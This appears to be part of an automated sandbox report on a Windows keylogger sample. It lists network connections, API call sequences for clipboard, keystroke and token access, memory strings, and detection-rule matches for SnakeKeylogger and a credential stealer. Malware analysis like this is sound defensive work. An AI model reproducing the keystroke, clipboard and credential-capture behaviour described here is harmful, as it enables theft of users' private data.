                Source: RegSvcs.exe, 00000008.00000002.4584508040.000000000270A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 61868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61868
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61863
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 61863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 61851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61851
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:61868 version: TLS 1.2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00954164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00954164
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00954164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00954164
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00B54164
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00953F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00953F66
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0094001C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0096CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0096CABC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00B6CABC

                System Summary

                barindex
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: This is a third-party compiled AutoIt script.0_2_008E3B3A
                Source: 6cicUo3f8g.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe, 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eafafbf7-b
                Source: 6cicUo3f8g.exe, 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2809f34d-7
                Source: 6cicUo3f8g.exe, 00000000.00000003.2157994667.0000000004053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a999768-8
                Source: 6cicUo3f8g.exe, 00000000.00000003.2157994667.0000000004053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9382d570-5
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: This is a third-party compiled AutoIt script.2_2_00AE3B3A
                Source: toggeries.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: toggeries.exe, 00000002.00000002.2202161081.0000000000B94000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ec7982b0-e
                Source: toggeries.exe, 00000002.00000002.2202161081.0000000000B94000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3f2def34-6
                Source: toggeries.exe, 00000007.00000000.2308382196.0000000000B94000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d34a216e-e
                Source: toggeries.exe, 00000007.00000000.2308382196.0000000000B94000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d7881e21-3
                Source: 6cicUo3f8g.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2194f30-d
                Source: 6cicUo3f8g.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2ad712c6-4
                Source: toggeries.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40e5e3df-e
                Source: toggeries.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_97ac1136-3
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0094A1EF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00938310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00938310
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009451BD
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00B451BD
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008EE6A00_2_008EE6A0
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090D9750_2_0090D975
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008EFCE00_2_008EFCE0
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009021C50_2_009021C5
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009162D20_2_009162D2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009603DA0_2_009603DA
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0091242E0_2_0091242E
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009025FA0_2_009025FA
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F66E10_2_008F66E1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0093E6160_2_0093E616
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0091878F0_2_0091878F
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009488890_2_00948889
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F88080_2_008F8808
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009608570_2_00960857
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009168440_2_00916844
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090CB210_2_0090CB21
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00916DB60_2_00916DB6
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F6F9E0_2_008F6F9E
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F30300_2_008F3030
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009031870_2_00903187
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090F1D90_2_0090F1D9
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E12870_2_008E1287
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009014840_2_00901484
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F55200_2_008F5520
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009076960_2_00907696
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F57600_2_008F5760
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009019780_2_00901978
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00919AB50_2_00919AB5
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00901D900_2_00901D90
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090BDA60_2_0090BDA6
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00967DDB0_2_00967DDB
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008F3FE00_2_008F3FE0
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008EDF000_2_008EDF00
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01674D280_2_01674D28
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AEE6A02_2_00AEE6A0
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0D9752_2_00B0D975
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AEFCE02_2_00AEFCE0
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B021C52_2_00B021C5
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B162D22_2_00B162D2
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B603DA2_2_00B603DA
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B1242E2_2_00B1242E
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B025FA2_2_00B025FA
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF66E12_2_00AF66E1
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B3E6162_2_00B3E616
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B1878F2_2_00B1878F
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B488892_2_00B48889
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF88082_2_00AF8808
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B608572_2_00B60857
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B168442_2_00B16844
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0CB212_2_00B0CB21
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B16DB62_2_00B16DB6
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF6F9E2_2_00AF6F9E
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF30302_2_00AF3030
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B031872_2_00B03187
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0F1D92_2_00B0F1D9
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AE12872_2_00AE1287
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B014842_2_00B01484
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF55202_2_00AF5520
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B076962_2_00B07696
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF57602_2_00AF5760
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B019782_2_00B01978
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B19AB52_2_00B19AB5
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0BDA62_2_00B0BDA6
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B01D902_2_00B01D90
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B67DDB2_2_00B67DDB
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AF3FE02_2_00AF3FE0
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AEDF002_2_00AEDF00
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F66C882_2_00F66C88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A71183_2_010A7118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AC1463_2_010AC146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA0883_2_010AA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A53623_2_010A5362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AD2783_2_010AD278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AC4683_2_010AC468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AC7383_2_010AC738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AE9883_2_010AE988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A69A03_2_010A69A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010ACA083_2_010ACA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010ACCD83_2_010ACCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010ACFAA3_2_010ACFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA0883_2_010AA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA0883_2_010AA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA0883_2_010AA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA0883_2_010AA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AF6313_2_010AF631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AE97A3_2_010AE97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A39EE3_2_010A39EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A29EC3_2_010A29EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFA883_2_010AFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A3AA13_2_010A3AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A3E093_2_010A3E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05857D783_2_05857D78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058577203_2_05857720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05858B583_2_05858B58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585E5883_2_0585E588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585C5883_2_0585C588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585C5983_2_0585C598
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058565C03_2_058565C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058515E93_2_058515E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058515F83_2_058515F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05850D383_2_05850D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05850D483_2_05850D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585E5783_2_0585E578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058504883_2_05850488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058504983_2_05850498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585FC483_2_0585FC48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585DC573_2_0585DC57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585FC583_2_0585FC58
